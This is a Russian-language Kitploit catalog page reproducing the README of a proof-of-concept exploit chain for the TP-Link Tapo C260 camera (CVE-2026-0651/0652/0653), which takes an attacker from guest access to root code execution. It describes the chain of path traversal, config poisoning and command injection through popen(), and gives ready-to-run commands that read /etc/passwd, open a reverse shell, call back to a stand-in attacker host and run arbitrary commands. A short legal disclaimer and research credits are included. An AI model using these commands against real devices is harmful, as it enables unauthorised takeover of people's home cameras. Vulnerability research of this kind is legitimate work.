Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
tapo-c260-rce — PoC-эксплойт-цепочка для камеры TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Исследование от @spaceraccoon. | Kitploit
Инструменты/GitHubGitHub/l0lsec/tapo-c260-rce
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАппаратный ХакингТестирование на ПроникновениеКомандование и УправлениеБезопасность оборудования и IoTАнализ Прошивок
GitHub
125 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
l0lsec/tapo-c260-rce

tapo-c260-rce

PoC-эксплойт-цепочка для камеры TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Исследование от @spaceraccoon.

Репозиторий

Цепочка RCE для Tapo C260 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Proof-of-concept эксплойт-цепочка для IP-камеры TP-Link Tapo C260, обеспечивающая RCE от неавторизованного пользователя до root путём объединения трёх уязвимостей, обнаруженных Юджином Лимом (Spaceraccoon).

Авторство

Все исследования и обнаружение уязвимостей выполнены Юджином Лимом (@spaceraccoon).

Этот репозиторий — PoC-реализация на основе его публичного отчёта. Если вы нашли это полезным, купите его книгу: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

Цепочка уязвимостей

CVEТипВоздействие
CVE-2026-0651Path Traversal / Раскрытие локальных файловЧтение произвольных файлов через /%2e%2e%2f в обработчике HTTP GET
CVE-2026-0652Произвольная запись конфигурацииПользователи уровня guest могут записывать в любой путь конфигурации через манипуляцию JSON-ключами в облачном API
CVE-2026-0653Инъекция команд / Повышение привилегийset_region_code_handle передаёт неочищенное значение конфигурации dev_name в popen()

Цепочка атаки

root@kitploit:~
LFD (чтение конфигурации устройства) --> Запись конфигурации (отравление dev_name) --> Запуск обработчика region code --> popen() --> shell

Требования

  • Python 3.8+
  • Сетевой доступ к камере (для LFD) или действующий токен аутентификации TP-Link Cloud (для RCE)
  • Учётных данных уровня guest достаточно для полной цепочки

Установка

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

Использование

Раскрытие локальных файлов (CVE-2026-0651)

Чтение произвольных файлов с камеры в локальной сети:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

Полная цепочка RCE (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# Reverse shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# Только callback (curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# Произвольная команда
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

Как это работает

  1. Отравление — Отправляется запрос setLedStatus с изменёнными JSON-ключами, который записывает полезную нагрузку с метасимволами shell в путь конфигурации tp_manage/info/dev_name на устройстве.

  2. Запуск — Отправляется запрос set_region_code. Обработчик считывает dev_name из конфигурации и подставляет его в вызов popen() без санитизации, выполняя внедрённую команду.

  3. Shell — Атакующий получает callback или reverse shell.

Затронутая прошивка

  • TP-Link Tapo C260 (прошивка до исправления)
  • Возможно, другие модели Tapo, использующие тот же универсальный бинарный файл /bin/main

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование. Всегда получайте явное разрешение перед тестированием любого устройства, которое вам не принадлежит.

Ссылки

  • Оригинальный отчёт — Spaceraccoon
  • Исследование протокола Tapo от Kennedn
  • Консультация по безопасности TP-Link
Скачать инструмент